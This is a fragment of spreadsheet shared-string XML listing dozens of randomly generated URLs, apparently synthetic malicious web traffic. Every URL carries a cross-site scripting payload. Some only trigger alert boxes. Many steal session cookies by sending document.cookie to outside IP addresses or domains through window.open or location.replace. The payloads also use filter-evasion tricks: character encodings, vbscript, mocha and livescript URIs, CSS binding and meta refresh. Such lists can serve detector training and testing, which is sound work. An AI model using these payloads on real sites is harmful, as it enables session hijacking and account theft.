    <t>/sddmw./8_w_zprfm3xmlr_/4kzcjz8weuh6h/tlb-s1yx-sk/paaa/diuni9hyza4zj/pfrywzin_dgvo/s4eznerfue/e6lb54gcl/h8kuseog82nl6vmpit2.gif?tbq5=08438&amp;elattntmrsicd=&lt;img+++++src++++="++annaraolla&gt;+"+++++onmouseover=+++"+[alert++('8je');]+++++"+&gt;&amp;lfnailtu2=03&amp;btni7o=361563</t>
  </si>
  <si>
    <t>/e@yh_ie2i/je3v8rm3kdexecut/rp/jc/wbz1oynjvkyiq2h/iwosen0a/jxjyp6iupdatehmeta/r4ey_msdmj./n2ptoar/tbis32tgnvve-c/ht4dsfnwa/dpxby.gif?hrrl=h9aitnoonstetochpc&amp;orecxeffoeleeoi=837&amp;isu=5259&amp;wftpfchildsz=ihiatavfne&amp;oie=befteopnioe&amp;a1j0uoridi=48200133&amp;ehpi=a+br&amp;sioeet4sbp=7ibnklmmr&amp;o0jjbexec=&lt;bgsound+++++src+++=++"+++++javascript:++[alert+('shseml3amu');]"+&gt;&amp;iuitho=deiaooa2eufght&amp;7sdenusu=1316594265&amp;crvfu8dh6=171401421&amp;pihrn4oroii=lnfe.nz-y3xt</t>
  </si>
  <si>
    <t>/tm3/imkep7/anrtaidsrh/e0hdx9cz@jrkdt/koi/tbhgsgr0rxlqw/g7reskfo8mie6dri3yuj/iqgiiliqh/a0p/m_aq7nalh/p7n_xm@ku5o19@npb/m5arawhgceqrrwdqhp.bin?wdj@ry5allx=&lt;xml++++id=+"+++x+"++&gt;&lt;a++&gt;&lt;b++++&gt;&amp;lt;script++&gt;[window.open('http://209.253.136.251/iell.nsf'+document.cookie);]&amp;lt;/script++&gt;;&lt;/b+&gt;&lt;/a++&gt;&lt;/xml+++&gt;</t>
  </si>
  <si>
    <t>/frji/a0-var2d-pgm-/i5./oekdxywxrfl/icad/r@8rcshuxgb3bkvpqc/ewwpmeaieeo9j7rk/ayetucigagodytfupp/anssc/dlh.ou.htm?uris8sndsjgih=68838&amp;condretrq=01&amp;uinmgojr=8519057&amp;etoreea6wovhlt=[\\xc0][\\xbc]script++++&gt;[window.open('http://6.133.79.20/nede.php4'+document.cookie);][\\xc0][\\xbc]/script+++&gt;</t>
  </si>
  <si>
    <t>/e50umomomzfcg-wu.jpg?hgzt=rr&amp;lyrvgjavizo=5&amp;slqnuod=horynprltne&amp;accepto0v77stdinzkhttps8i=nsefertwad3d&amp;g16e1ohat=466599&amp;oruq3rr1ln=&lt;div+++style+=+"++++binding:++url([http://www.ic.com/script/t6o.msf]);+"++++&gt;&amp;essahaut6skdi=lohttps&amp;i8sv=8accept&amp;sovtoa=frppeqtp&amp;0cefycsogtri=389465&amp;8pxtdoeniso0ha=hislereci0jn</t>
  </si>
  <si>
    <t>/eslkncdxdmsan8onra/iv0n1rfak0auexec.shtml?insd=&lt;object+++classid=+"++++clsid:...+"+++codebase+=++"javascript:[alert+('oelik');]++"&gt;</t>
  </si>
  <si>
    <t>/9ima3tbnhad/kc4ayohib@fav/hxfcycwpm@-7n9rt24ot/.hbump/3-jal4usr1/ustdnalbt/3pmius/iodfejtonyttctasrs/bnm3rtee/hoiglsinsiri/g7xmallmhhosas/jfkhv.dll?ht0imr0mnye=&lt;form+name=ra8t++++&gt;&lt;select+name=morf++&gt;http://www.lhlwtr.com/fsrer/?&lt;/select&gt;&lt;/form+&gt;&amp;larauuw=0518630864&amp;jhtacceserd=2bl0areem5f&amp;yc53tpphasuoac8=he&amp;sen=46&amp;eaep7h=rrt</t>
  </si>
  <si>
    <t>/pep/watitysyeeneiidbhrr/rhrr1etncsmneaei/130abecqvlcrjar/npmyhakjzrwss1l/enmh/nmwdlg/dsj/rmondehetnhasces.css?nc=&lt;img++src+++=++++"+javascript:[document.location.replace+++('http://www.roesntns.com/cgi-bin/asstde.cgi'+document.cookie);]+++++"++++&gt;&amp;fttmt3e8ini=+i&amp;ibeeeenih=phpziowawindow.openedsfh&amp;o0e7ni=nnyvdt&amp;rt0wolosyo=2npexec&amp;tiomnuwfyt0te=objecteis&amp;-fsbt+|stcopy+a&amp;eeicwei8wan=raihunion&amp;ttfdai0afshitsr=3</t>
  </si>
  <si>
    <t>/qpnj/5hyx7pr/t7.hmirlysds/hz4lxkcor4ze2a/tnce/t.iycr49/rduqoaedoentaarkurhk.php3?hh2=2g&amp;tnr8ah6heo9=&lt;img++src=&amp;{[alert('fkds0n');]};+&gt;&amp;nsse8xthgttveo=57344626</t>
  </si>
  <si>
    <t>/ayr2reergbpieli/atb1k/ie8.shnqgl1wkaavlj/ggletcsq.php4?lfy=nckihq+sqia&amp;nnra=aoine6nwtteultd3t&amp;9@3h=ef&amp;leeap6r5zh=esd&amp;srvob=&lt;div++onmouseover=++"++++[document.location.replace++++('http://www.tronarni.com/cgi-bin/lidesiaras.cgi'+document.cookie);]+++++"++++&gt;&amp;lib3-q=0345679&amp;treeeccc=5ljx&amp;casgtiixadhg=sampsv&amp;lu_q=s8wice0nhop:&amp;zli=6855245&amp;aenp=305&amp;it4=0524&amp;e6nlahoossh=mto</t>
  </si>
  <si>
    <t>/miqt8/g.k.qw2dkb.-qdlrsq/aereidyeooocnr/yredegizee/rlvhlax4vtr7/hrobo6/tuxj2jzah.7i/0mqhky9m1mz-0byi3dy.asmx?0qlr=75421471&amp;moh=7370422&amp;ienthehcueq8=604&amp;rn=tcmwe&amp;zehbw.scg0db=&lt;script&gt;alert+++(+++"+noe.tteer")&lt;/script++&gt;&amp;dfnph-bodyomov0o_-=5qnslahh&amp;setnsdac=xjf.rfb&amp;uiptenye=nablqa&amp;aoy=te;unnuao&amp;i4a8a5s=407&amp;seqnu8=anlev&amp;oo0rrxrbmdcmet=cs</t>
  </si>
  <si>
    <t>/r@kwrv4lhkq/exltry-zv58uoj/n2xzrr/czroq2rlm42tq1rpf3/ec503dyouwl2mj/ddnqxeq-iwug/uhpww6czt4xu/sgtzeeewehq/noaiorqtsde/el6h6srat/qjt9xadme5.msf?tqehyertoogbn=5577869&amp;srttllhnott=5379598173&amp;hti=sre8yxi-a&amp;tvtnot=619691&amp;eaencre=4383314&amp;1v1ixeee=aehrc&amp;hoeeh0lo=vae+r&amp;qo=av@etla0rtq+ewurdbh&amp;ta=&lt;body++onload+=+"[window.open('http://48.221.20.246/etni.asmx'+document.cookie);]+++"+++&gt;</t>
  </si>
  <si>
    <t>/rinntmevtisnssr2ht/emedthsehtit.asp?tvxrboot.inig=siheeo3nq++%ra8&amp;2ajbody_=9031&amp;nnsneoezevitrko=32276870&amp;pprtsoaa=280779935&amp;woegfnaehpmtpm=iy1ileraccepte&amp;0a4tuf=szsqt3qsm.4&amp;ero0z=mfstyahie&amp;c@dgxz=9xdn&amp;6h1xatuarnsne=&lt;link+rel++++=+++"++++stylesheet++"++href+++=++++"+++++javascript:++++[window.open('http://114.165.131.91/re.pl'+document.cookie);]++"++&gt;&amp;8h9=802822&amp;yecfspvaghout=24009429&amp;nolaeeeu=4&amp;enwicowr=29&amp;kenn9odd=6650&amp;scsm8t=bdopv</t>
  </si>
  <si>
    <t>/u.bf/ms/rwm.hjx/aegrseqrnisogodetu/rwenhua9aidteeaiwo.jpg?28iydhsjwhere=teemmieeoegcadteu&amp;reab=ea+hadmin&amp;1bzstdin=nd\\&amp;if=latetneseya8rdapmi&amp;ndlraa=60&amp;lccgdjrtls9h=5&amp;pilw=siepd76ydwwieeo&amp;tk7c9=jtpssajeeye-o&amp;fesseb=w&amp;yzzs=503045&amp;yonagbtud04ti=&lt;img++++src=++"++mocha:[alert++++('at');]++"&gt;&amp;srrhntttsewdmn=vbscriptrnph-smet</t>
  </si>
  <si>
    <t>/jc9g/4tlf2uene.tiff?aace7fn0es=&lt;a++++href+="++++javas&amp;#99;ript&amp;#35;[alert++('nu');]+"&gt;&amp;snv7trs1r=xqj1&amp;kr1i=cizndsn6ibsednlw1&amp;ebasseshmoey7=5040</t>
  </si>
  <si>
    <t>/inputvtl/a.st8xllm/ltbsl3e/m4elalo1s4eocctgpote/icqgsz@yd/43wfreb_u@.kip9/s4actdarans/r4184mqdoh8vco6t/hdtdortenlonhgpik.jpg?hrheaa9eget=676772&amp;e8amavetqhr=aiv+aenwigoi&amp;eoe0bav=&lt;&lt;script++++&gt;[window.open('http://254.161.11.103/ve.jsp'+document.cookie);]&lt;/script&gt;</t>
  </si>
  <si>
    <t>/tnitrq7mruh/hkee9tharl/20adsock_streamv0uwq3_h%u/imlsd84i5tseofoxn/l5n/rput-mo9sor4_kc/etu/14sfc-skfcce1/r1gyv5uxqyhjdlyck-vx/0feobbvvnbckvtuape.php?ntdoherit9e4eo=gnh+&amp;j&amp;xp_@jxmle=o&amp;nleeea=rtlw&amp;hbgtseireenrhn=875&amp;d5cli=6625095&amp;yregecbsesaef=nu;&amp;7hwgethomeo8.=&lt;style++type++++=+++"++text/javascript+"+&gt;[alert+++('ah');]&lt;/style&gt;&amp;afstaeoie=0n</t>
  </si>
  <si>
    <t>/e0/n9jgzuupo1@3/c0v-/bbgsounds/nuwmg1/tthr6zel/tl/tevteaceatmdofe/pcl4r.shtml?52uisoko2eb09=uhorm&amp;9drmw3eipede4u=793175&amp;tgzmm=anl&amp;osdssandte=&lt;iframe++++src++=++"++++vbscript:[alert+('zsjxlad8');]"++++&gt;</t>
  </si>
  <si>
    <t>/rtksari.hynl/dt9zcn7ttfetigcs/.xmhta/6ijybpcpof/0ye0t8/o2beczhgjwmfpjm-/sam-0ruuk0vtelnetkn7/tlia1me7/oltr/nasivczm/iuonqollpn/rsod.gif?7r4jqs=347020&amp;ijew=&lt;input++++type++=+++"++++image+"+++dynsrc++=+"+++javascript:+++[alert++++('rcndde');]+++++"++&gt;</t>
  </si>
  <si>
    <t>/wtmtx22xd.qur4fqo/r8yd/d7bm/ovlryt6pashqkq/h7aeg/nred0i1sdn1swie/gaaaayyeieo.jpg?yhlhisnie=&lt;a+href=++++"+++about:&lt;s&amp;#99;ript&gt;[document.location.replace++('http://www.ilsieses.com/cgi-bin/ittensesor.cgi'+document.cookie);]&lt;/script+++&gt;+"++++&gt;</t>
  </si>
  <si>
    <t>/lntm2ih/-rmfdocument/thatmauewosunathl/juazlb1oidoda/gl4a@lvufht9d/ctilhc/0nsrn/vumiacth1eetoigtu2b/ands5tiwtl/qe1esllt4olon6rc/nrc/ts1tpeek.sh?6conbqh=&lt;img+++src++="+++++nsna+++++"onmouseover+=+++"++++[alert+++('n0gne7u');]"&gt;&amp;iw=n-perl&amp;bp0oi5saf=vad&amp;em3rentyn=8&amp;ttee3b=60210338&amp;2bsctu=wadio~4ep&amp;irnz8insert&amp;adei0ert0ewt=774952&amp;mw35mn=174610&amp;srvxrwftpus76='hdwt&lt;rnrt&amp;aehr5l=00438367&amp;boohelxaeh=nue4towteawinntkt7qmea&amp;tiurebichjvepmn=ahs9fbtvwl</t>
  </si>
  <si>
    <t>/dmmoieihasjpttsolola.dll?0edb7vtiui0o6si=92752442&amp;2hyr=9jp.chfvdb&amp;269osypmb=lha&amp;nq=hnnk"++&gt;&lt;bodyonload=alert+(document.cookie);++++&gt;&amp;ereart4ossdlc=0eoknexecncsfrtl</t>
  </si>
  <si>
    <t>/t1hoi/spnoo.msf?ueoe=76&amp;twp1uybt.e9=&lt;img++++src+=+"javascript:++[alert('tfet3ain9');]"++&gt;&amp;ph9ots_ms=eelf5(o+rr&amp;idrlhvxkhomemt=581&amp;iannsurr=edk3f&amp;rrhaonandatmml1=cb2qfrz@i&amp;fcta0eo0eenbeea=15880857&amp;ltdeehqt=0&amp;kbqlkhisrt=eetceorhodtoain1s&amp;tmdchild2qbnb=43&amp;zdrssspiibires=035564&amp;irckassb8=8awtt</t>
  </si>
  <si>
    <t>/td3dju@7vs5x3vuuptiw/o49iframe/gyhfothtguro/dauy/bsowbi/nprdsigtthw18/ihaateiatrnuoss0a1/sdmlxa5re/elo/1u0n3.buf_ny./laj7pfv9m7ap8.exe?drno857ayhzrs9p=5&amp;itbieocuu=0copyaen&amp;hteze8t7dm=&lt;xml++src=+++"+javascript:++++[alert('yiknsap');]+"++++&gt;&amp;ryoey7tciyef7xr=ne&amp;er9aehrth=jie&amp;q1qjhh=hs4d2zbk&amp;0nocrea2cdorr=oi)a)nohsftpviframexaa&amp;sruhfm=zisbyheeiina+op&amp;h3dun=3&amp;simbtt=rfr&amp;so=lb$sboot.iniila+oaeeho</t>
  </si>
  <si>
    <t>/trtoyt2t2awd/8c1tpwdp6/cthadsrsuweltetnm/oobject.nph-behzshutdowner.asmx?lonlruzd0onnl=7623694&amp;oceeleiote=&lt;div++style+=++++"+binding:++url([http://www.raatveic.com/script/f9odh.php4]);+"++++&gt;&amp;arftaa0yhot=oybnlwuj1kx&amp;r5eoiaeo=demydrop?hnzs+8ma&amp;me69@ligweval=sggtaafeeo</t>
  </si>
  <si>
    <t>/n./kpp_zdencopy1b/iwpc9cdaaaemeeig/pxsntpb4bjho9me@@rb/s3hhol3aa6oxa/fki1sn/jerteepsrndeenmajg/hi6xfd/inwuffv.html?sdult3owq0@=4&amp;aclnpigo=e--xe&amp;ugpht-gq=ienedm6pendq&amp;xerfuep=egoewff7u&amp;zaai__qtelnetc=&lt;meta+++++http-equiv++++=++"+refresh+++"++content+++=++"+++0;url=javascript:++++[window.open('http://40.147.182.66/ntre.msf'+document.cookie);]++"&gt;&amp;ntyssdt2gqenh=1821689</t>
  </si>
  <si>
    <t>/icvq/aadusi4eoerct1sdjeic/2wl0fv/yhcdrtm/iqu8/a4uelptogee9csao/nhjzogd-ao30que0wnt./abrqoweq2gr1i/rbl4eajtpukoa8m.html?woitrao19=tjuqdkfn&amp;xtrre=052563&amp;y0ayicmin=3tt&amp;rce5vbs19a=9&amp;fno=&amp;{[alert++('ruh');]};</t>
  </si>
  <si>
    <t>/4perlcr1lkgwdive7/hveqebfc03zesfoim77x/u36rbrz7kpwggwfv/ngesuouc/be2oea.htm?msnsienisnzale=643255&amp;axzi0t4sfaecto=51163&amp;4rpgazopo7thsn=666193&amp;nny=417229&amp;dlikenr6.fwj5object=oioposition+&amp;ae&lt;c1&amp;6yspspseb=&lt;div+++++onmouseover++++="++++[document.location.replace++('http://www.ti.com/cgi-bin/toaselre.cgi'+document.cookie);]"&gt;&amp;gqygvjf=r7wgssw&amp;el2buomo=na3&amp;roecefugmdzk=ftphmeelroeeus+u)6+n&amp;pi=804&amp;eioesy=ere\\yebi30aiobwp-rnsslinke&amp;m-vtqco2gj=90716&amp;0ymoaeg=330&amp;aaoeisade=4479173&amp;nanbetcrsiw6=t6ceikis8zy9</t>
  </si>
  <si>
    <t>/udmbn4c8cixp_bz/nxpza73dpxwyhf7m.png?nnghcnbchap4e8=yy|oc+uogbape&amp;r2hinoo1=016174&amp;i2doaic6thn=lte&amp;e6egle=dr&amp;edbv7osvcdj=rfnsteode&amp;gqeauiaonud=rle.&amp;en5shon9ioi=&lt;body+++++onload=+++"+[window.open('http://15.133.133.11/laar.php'+document.cookie);]++++"++&gt;&amp;ntmrzacn7yeade=comlietma&amp;tatimgoh=1or@zjgh-yi</t>
  </si>
  <si>
    <t>/brijtr_az.asmx?toetoe5ottx=mall4&amp;emoeeol=oehoart3rincludel&amp;gphpincludec3uoh4=41&amp;slolnjiryqi=41133&amp;gwyccrst=sn3slocation&amp;p5qe=6093&amp;ieee=6&amp;dt9nltmtuwols=etan+d5lcds$&amp;nconnectodz=gdaaydrt3b7ewdtife&amp;psdiotalq=&lt;xml+++++id++=++++"x+++++"+&gt;&lt;a++&gt;&lt;b+&gt;&amp;lt;script++++&gt;[alert++++('53i2y');]&amp;lt;/script++&gt;;&lt;/b+++&gt;&lt;/a++++&gt;&lt;/xml++&gt;&amp;j4tnemwlneznp=ode&amp;oaieoua2hy2r072=2ltdez0&amp;xot6hzelli=aeee1ret&amp;wpaml1y2t=iqfsbraq2u&amp;itanln3j=iuh.fhyw4y</t>
  </si>
  <si>
    <t>/nodmaoabiratoe/tdtib/e-5izzn@skl6vds.css?jwdincrkrvx=ylhzctesmi&amp;ievng=39387662&amp;ubelptpnl4ea7a=&lt;div++style+="+++++background-image:++++url(javascript:+[window.open('http://237.24.206.184/orinra.aspx'+document.cookie);]);++++"+&gt;&amp;trelrfdn=sigvdx6r8&amp;keriipb=dbei5hv</t>
  </si>
  <si>
    <t>/mq/sisnherextasmu/em/5kfsvpy8/jaruhantstnvma/nafabetanvi/euquruozd45apmo/srhllocationxozvub.aspx?tetmsmcjatblnyy=43&amp;6exne=8280466571&amp;gonr=&lt;style+++&gt;&lt;!--&lt;/style++++&gt;&lt;script+&gt;[alert('rd');]//--&gt;&lt;/script+&gt;&amp;3ww=h3pyshhp~ty&amp;iso=+oi4giu4e5y&amp;1ayoowtwtthtgif=mlrhflaeaaee</t>
  </si>
  <si>
    <t>/menaadt/a47c7ox/rzs8/neiytsnaloynmnck/t6cddmzjsbbd2/nm2cxckp/o-zw/e7ewn1tgeohmne4n/fgy/eeqt/asludaeqateegc.mdb?tvryi=t)loow4mjr~ol+group+byt:+t&amp;h2tcnhoasdos=eoedconnect3os5h95hhie&amp;isl9frseeii=&lt;style+type=++"+++text/javascript++++"++++&gt;[alert('ezefvhe');]&lt;/style&gt;&amp;uad7eshy=4162403&amp;ada3fnanelm=1ndsg:&amp;iewoydaai8x=+tcl&amp;oo=i\\ianp;re-&amp;nnbn0ht43dr=t&amp;6yihne3o4bhn=hsuogeai&amp;oiitsew=0r0e@lcc7&amp;qc_tameta.6uwg=+csaslbuioi\\f&amp;be=ywt4tmb_doc</t>
  </si>
  <si>
    <t>/iu1o4mta1snr6s54oolt/nz@z_b/l_nncp.0perl/h44txuwoixjy0kcfgru/zuc4ruwzgmxd9pyba/gk6s8@cs.i_moa/lcmi/che5feetabhmsowctra/t3w2rqezlrud/esx006m5.52lbq_loqc2/y3j@u3str.e8t0.mdb?9gcmd0_dqpa=yq2bwxcjqcmp&amp;yoseapytipr=ueotcec&amp;r8zigbgierkbtf=&lt;link+++++rel++=++++"++stylesheet+++++++"+++href=+++"+++javascript:++++[window.open('http://123.241.9.241/as.asp'+document.cookie);]+++++++"&gt;&amp;eruloanehr=1tr&amp;-rmnph-9k7=mdntmhptdiay84k&amp;rnwnna=38</t>
  </si>
  <si>
    <t>/ybhpvwjinclude0g-u/nqgoqjh-nc.png?klw_xayxt.qe=xs80g_lbd&amp;udks=&amp;{[document.location.replace+++('http://www.restsi.com/cgi-bin/llra.cgi'+document.cookie);]};</t>
  </si>
  <si>
    <t>/t07mpuuwk_b/fdrdto2nntwauo/ht4ngkiec/egzo1hjihg/bdgjg6e91kigby0./srx2glgv3ravhi/lcyrzauqnymr3em2/3denit.swf?vdbe0lme2ernel=evqyspki.-gh&amp;sae3vgn=fp0&amp;jreuetosshn0e=&lt;meta+++++http-equiv+="++refresh+"+++++content++++="+0;url=javascript:+[document.location.replace+++('http://www.la.com/cgi-bin/ristesitin.cgi'+document.cookie);]+++++"+&gt;&amp;eooi=lumebklehctlo</t>
  </si>
  <si>
    <t>/detedrc7rsoc0dsn2n5t/pd/ie6n_r/dfd2py/ir/c5cdq_8lzzufv/eeil6iesi/hxfgidofalb8/o0fbj/cobhietemoa7ataiayf.html?6oar=&lt;iframe+src+++=+++"+vbscript:[document.location.replace+++('http://www.on.com/cgi-bin/an.cgi'+document.cookie);]+"&gt;&amp;bnabfexitoer=4509330001&amp;uq2eaon7efbhtiw=gylwvad&amp;pn6gsrnttfumo=finch&amp;mqt2tvns=3981037</t>
  </si>
  <si>
    <t>/ioaeeolto/9crhlocation/dn8sernrknr8ujx/gmhhojwysce3dindat/sntanlyv9s/1cptcoggvwvv@4dde-/skzkwqe7tucsw5m/0b1r4balmmaztem.asp?sxsy=3351&amp;is=9&amp;zvdnd=&lt;div+++style++++=++++"+binding:+++++url([http://www.lalens.com/script/ead.php4]);+"+&gt;</t>
  </si>
  <si>
    <t>/xkzvh7o/yebdhozeacgodpokhlc/ou5eeys/mogt7oubeato/x_/h3_kno7avu/mtf/3aatiigc7c8air8/e8heibesltpbyo/nbwmj5ujwg5zli/lcsjrvono2edlio9icd3/oyn68q@d.nsf?7pjncozhtacces-m=hlq50om&amp;execkfopenzumunioncq=esc&amp;-aup=hoo+e&amp;rin=&lt;&lt;script++&gt;[alert+('ii8rhr');]&lt;/script&gt;&amp;eenthirt=bsn5wshs&amp;94documentlformpdeleten8bg=hntuimesd&amp;v1hnaneooer=97059</t>
  </si>
  <si>
    <t>/4a2eh/cy107atvsgaf2j/epsd4z6drop.n/gcgx3do0eppe6l/26toiildep21/elem8bu8ko_nqm/po1ntoecafawsq/fd@x/51uj7_hl/lrahiuer4rf2e5.gif?qshdtaiathe3b=8&amp;dtmpj1tscriptn=id@qz@janem&amp;ta=8dixi0nwajxi&amp;n2yo82tyo=o63ous1&amp;iiez1zpa=&amp;&lt;script++++&gt;[document.location.replace+('http://www.ormaonna.com/cgi-bin/enge.cgi'+document.cookie);]&lt;/script&gt;&amp;l7cdsoo=28&amp;oejsiehmaeotry=2eaic&amp;edxe=o@taall&amp;1yvfv3=adqho&amp;hesse0eiek=02092</t>
  </si>
  <si>
    <t>/oeiuooteueen0eibit/vrda6/m9afa5iuglnieagadt/h6bi2/kn/0eiriy6intee/jqyj7u@luuezzxxit.dll?yau2=hnetcatt&amp;q9cmdk0evfi=dhhtrstrshaxefdisa&amp;6rqgndasoi=c86qw01@o&amp;dg1rstmsrh=qnr&amp;fdprvpo=oztx-ep1xf&amp;3armceehhi=nkifxigl5f.&amp;3af1i=)rin]qnf0tilhht&amp;i0fsjn=llpw&amp;loseflt9ut=326&amp;etqtuhua=&amp;&lt;script+++&gt;[document.location.replace++++('http://www.siri.com/cgi-bin/tiniseiech.cgi'+document.cookie);]&lt;/script+&gt;&amp;c4i_peh=68370471&amp;3oewh=7cmsrdtrcteahwbicr&amp;ahensee8t=nulld&amp;aaf74o=ti</t>
  </si>
  <si>
    <t>/tjlgijdlqh-x./lx1sea/abartlsaeh/hyw7s2d.exe?nuks7yshutdownxlnhl=otnwbe1tdew&amp;sbiri=4338&amp;tja2ietn=tn&amp;iseooniimrn=javascript:alert++(+++++"+++ot9z.o")&amp;memmoy4r=d3qic3vo&amp;nmeatoi=e+xterm+ok+7wp-u&amp;feynwawemoev8re=7nvprocessing-instruction6pjzdpassthruew@+&amp;mr0msi9ua=enrpniopasnl&amp;oiirrhi=mr%r&amp;tseeehpmfhospc=andsza</t>
  </si>
  <si>
    <t>/1ueetyzishbatlawhrh/2t8p_dtajy/acjxs@1/cy/yha9keeh5nuwtd8ykrc/jeikiiywvhoqz75x/hxxrfrpx@e/i@euf7y-wb/6recy/ml_0/mnorsw.asmx?wmbrolulwte=&amp;{[alert++('eetwim');]};&amp;egopafis=rue|tuiercja&amp;xmvxatmp8=64861&amp;shfn7eeb=0857540&amp;iafoesrlatsrkat=an=+a&amp;uufiaco=tmpfzr</t>
  </si>
  <si>
    <t>/v7r1cocl/ii6qpsgwjv@0sz/@l/xc.ftrz/tnmnnrt.gif?ljzrffaq8bm=ao&amp;suiteroai5=o@&amp;e3o8gs9odtnt='iahieeaoo+b&amp;hiqr9=&lt;style++++&gt;&lt;!--&lt;/style&gt;&lt;script++&gt;[alert++++('d4jsc');]//--&gt;&lt;/script&gt;&amp;iueoueigmesthm=240823576</t>
  </si>
  <si>
    <t>/7d4lm4hpe6na/ase/lghhstxivlhuge/d2gshutdowndjgfy_sc/9eoypsesgczl/bsllbtognlt5hlhae6oj/iv-lky-o1mi/su/wtapeo/ztbtya4s69hxhet/feif/itxpwn1lgrn7d7fszc0y.shtml?iyqnrar66dh8ae=06871898&amp;camn7ayapgfvl=[aldt&amp;asbleb=rsatamoeosallpassthru&amp;be=(t&amp;p1qug4vsystemax=63243&amp;0f=6227531&amp;ukaxtj=&lt;script+&gt;alert++(++"+u5nis7r2eoaihn.eroen")&lt;/script+++&gt;&amp;aincludeloodzn=ohers6ii</t>
  </si>
  <si>
    <t>/er/73tresd/jsjy_wul2urx_ar/6lfs2tl3d__execusrs/emassmaorfwent/lzd0qj.0s0am5vst.jpeg?wt2bt6all5l3we5=9&amp;5-xqaxtzo=ae1hotejdtreowot&amp;gcnt=9670173712&amp;rntuc48h1ur5=ndyfedetdlehsts&amp;groemeqk=4&amp;how=d6en&amp;aagrneua=&lt;link++rel=+"stylesheet+"++href++++=++++"++++javascript:++++[document.location.replace++('http://www.itarve.com/cgi-bin/oris.cgi'+document.cookie);]+++++"+++&gt;&amp;y0.bmgqux=wete&amp;&amp;edivduz=0163380777&amp;2ta=254158&amp;mycr=4xtt2&amp;oeotgrueifen=jnhm5&amp;boot.inijbildfrom4=ttfiel3ed</t>
  </si>
  <si>
    <t>/axddqi0kh/n5lmmf2enn_l2ru/6m.js?ozalmscdas=uqj&amp;tua=8228350&amp;oahievenxskto=gthtpass&amp;oc=oflilhsetn&amp;nuiz=i%n&amp;dyxay=h09lpum47&amp;tr2sfgeoha=&lt;img+++++src="orns++&gt;+"++++onmouseover++=+"+++++[window.open('http://15.76.244.118/lige.jsp'+document.cookie);]++"+&gt;</t>
  </si>
  <si>
    <t>/jbr2i7szeoagttledy/bboot.inicqy@bxo0pa/iysaedt6cymnezhm0e/otoyletx2yefanoat0r.pl?ywinput@.pcot=orcxedhttpe&amp;oiabiedcayoem=&lt;meta++http-equiv+=++"++++refresh"++++content+=++++"+0;url=javascript:++[window.open('http://154.92.250.46/at.cgi'+document.cookie);]++"+++&gt;</t>
  </si>
  <si>
    <t>/h2ql0-qtoafv4..gif?phpj@xdstdinj=&lt;div++style++=+++"++++background-image:++url(javascript:++[document.location.replace++('http://www.mamans.com/cgi-bin/deliin.cgi'+document.cookie);]);++"+++&gt;&amp;eypoedvdhevdwse=pwas=fa</t>
  </si>
  <si>
    <t>/s5t4s2bmoc-csi80dq/xv0pioptwrqion/rxb.cfm?r5etdurluudt=4550784621&amp;f7qiesotrq=3652&amp;earlrwd=ezxuj2&amp;hewoae=16&amp;eoxikevedtlaai=ph+so&amp;sg78e&amp;yasuexpe9lnn=php~dbtmp&amp;wbhorv4cwtlogueval=mdww2ywu&amp;a3varbtw_du=scriptnulluuc\\dy&amp;qbeqo=+ipi&amp;2eobposelec=61&amp;h6vnja_6hpba=o=1b[erc\\8&amp;ea1codtsesis3t=ttmtiieonwac(e&amp;eel1y4x6uuh9x=javascript:++++alert++("+fa927e.bcca")&amp;eaoo=78816020</t>
  </si>
  <si>
    <t>/scn/wpa@p-rtf/zbagwg/vwdoistgeler7tsuez.htm?ea=852717&amp;tseesiaoiu=&lt;img+++++src+=+++"++livescript:[alert('ah8');]+++"&gt;&amp;sqb6k8vdf=yheegsrees2j&amp;oa5wefiexigdtx=losi9eeran4rneetld&amp;dhhron6ypoom=2134864574&amp;gac=253&amp;t0c=]7hl&amp;rg=yoznoobjectfehm&amp;tmo=248989&amp;0oaaca1=ri0ntnia8wbody&amp;ei=eog&amp;rcaas0otl=oej2tuumbo3</t>
  </si>
  <si>
    <t>/ros2rsdo9wv@81b/rra6pnaixeeooaae/cte5ocntbtanefco/u1/veelrhi7h/ebrd.ufcdqv5oaw.png?mhnowhth=5302421&amp;qe=41741060&amp;sndeazo1eno=hxphp&amp;aoeuullrwmkfjhi=&lt;!--+--+--&gt;&lt;script&gt;[window.open('http://110.223.154.198/dend.php'+document.cookie);]&lt;/script++&gt;&lt;!--+--+--&gt;</t>
  </si>
  <si>
    <t>/ewknijqa2ejctss6v/cboo/otbghjgh/ihotwreu.asmx?evalbdocumentxgb=re:e(elsusrnph-+lb&amp;ut=60864&amp;hra=&amp;{[alert+++('aevue5toza');]};&amp;ro7i0ededu=772119363&amp;lesygonasofmen=processing-instructionatnm2plike&lt;cegitea?oed&amp;ernhfl=r&amp;umtqe6ai30esst=di01tli&amp;ael=47&amp;ago=cbswraionesduq</t>
  </si>
  <si>
    <t>/7-pz5ybrmkwp78/cmdc/1m/2v/ret5smbdny8cot/suloinnp/lwn/bsk/2srdeeefadrxl/r3o8uei/peaoeutphyteb/le2rjeafjdyo33arux.js?l5eoimad3eewle=skf1&amp;robpn=&lt;xml++src++++=+++"++++javascript:+++[alert++('etrneed');]++"&gt;&amp;3jwqukdm=rd4od.w&amp;sihelioa=3068738&amp;osyparnky3l=080415895&amp;t5zs=28408&amp;cniucscriptabr=cch0a</t>
  </si>
  <si>
    <t>/nmycscsr_qow6m1l@b/o3imgjwti3l7kr@.sh?uri=&lt;form+name=aio&gt;&lt;select+name=lndr+&gt;http://www.6h.com/es/?&lt;/select++++&gt;&lt;/form++&gt;&amp;waiay2htrr=5r3&amp;had=33633&amp;so8obo=padx</t>
  </si>
  <si>
    <t>/vqzrwgetl.uuddoub/i2iwhpjrzhhmnk/esoyi9_mun-ynk16.bin?ozs8ggf=hqy7dg9g&amp;r4seemltie=dbci&amp;tantslereegaa=dn9q&amp;7ow=5602282125&amp;ueluatekuz6eee=&lt;div++onmouseover+++=++"++[alert++('aosiebo');]+++"+&gt;</t>
  </si>
  <si>
    <t>/mgth8oyytad/elrmw9eur17/17k0dfmqdxgsx1/js2pr3luscdagmyuuro.msf?exaofihne=&lt;div+style++=++++"++++binding:++++url([http://www.ient.com/script/ieeepvcn.jsp]);+++"++&gt;</t>
  </si>
  <si>
    <t>/s-pkhe8/o85.hzn3q8e5z/6vzmpkxlannouncj/voyxbdv7cyr/rjt7eetsgthta/nvmmd/o8fzoq/i4-e2f3svu48jwed/ixhiframes04qmh4-/cq9ogipov7.shtml?plaaaetkiffnbu=&lt;a+href++=+++"+++++about:&lt;s&amp;#99;ript&gt;[window.open('http://94.157.84.146/orieta.cfm'+document.cookie);]&lt;/script+&gt;+++++"++&gt;</t>
  </si>
  <si>
